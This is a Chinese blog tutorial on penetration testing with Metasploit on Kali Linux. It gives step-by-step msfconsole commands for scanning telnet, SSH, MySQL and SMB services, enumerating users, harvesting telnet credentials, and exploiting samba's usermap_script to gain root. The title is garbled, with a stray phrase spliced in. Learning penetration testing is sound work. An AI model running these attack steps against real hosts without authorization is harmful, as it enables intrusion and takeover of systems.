zoukankan      html  css  js  c++  java
  • 渗透测试专题二之msf(kali)的攻击教程将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统

    主要功能:

    • msf   console的使用及其配置
    • msf的主要作用及其实例

    主要功能介绍详情

    • msf   console的使用及其配置

    启动服务:service postgresql  start 

    如果先打开了msf的界面: msf > msfconsole

    运行命令:msf> db_rebuild_cache   #如果显示数据库为连接

    则运行命令:db_connect  #开启数据库的连接

    也可以通过:db_status #查看数据库的连接状态

    • msf的主要作用及其实例
    1. 攻击远程Telnet服务器
      1. telnet服务器简述:常用的远程控制Web服务器的方法
      2. 登录远程服务器需要:域名、用户名、密码

      3. msf攻击telnet服务器的过程
        1. module:telnet_version
        2. show option #查看相应的参数
        3. msf> use auxiliary/scanner/telnet/telnet_version
        4. show options #
        5. set [params required yes] #设置必填参数
        6. Login with XXXX/XXX to get started。#从这条信息中,可以获取到目标主机Telnet服务的用户名和密码。此时可以尝试登录。
        7. telnet -l xxxx [targetIP]
    2. 攻击SSH模块
      1. search scanner/ssh #搜索有效的SSH模块
      2. use  auxiliary/scanner/ssh/ssh_enumusers normal SSH Username Enumeration
      3. show options
      4. exploit
    3. 扫描mysql服务器
      1. moudle:mysql_version
      2. msf>use auxiliary/scanner/mysql/mysql_version
      3. show options
      4. set [params required yes]
      5. exploit #渗透攻击
      6. 获取mysql的版本信息
    4. samb服务的攻击
      1. smb服务简介:将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统
      2. msf攻击smb服务器的一般步骤
        1. module:smb_version
        2. msf>use auxiliary/scanner/smb/smb_version
        3. show options
        4. set [params required yes]   # set RHOSTS 192.168.1.0/24
        5. exploit # 启动扫描
        6. #查看扫描的信息 1、局域网内的正运行的samba服务器,及其操作系统类型
        7. search samba/usermap # 查看运行结果
        8. info [7中的usermap_scritp] 
        9. set RVHOST
        10. exploit # 启动渗透攻击
        11. 从[10]中可以知道攻击是否成功,如果成功 则可以获取目标主机的一些信息(id #查看当前登录用户的一些信息  uid=0 #root  gid =0 # root)
  • 相关阅读:
    Vue生命周期(转)
    Gulp的简单使用
    webpack的简单使用
    面试----手写正则表达式
    面试----你可以手写一个promise吗
    baidu.com跳转www.baidu.com
    php 操作时间、日期类函数
    php操作文件类的函数
    sphinx搜索 笔记
    bash下输入命令的几个常用快捷键
  • 原文地址:https://www.cnblogs.com/Erma/p/7281601.html
Copyright © 2011-2022 走看看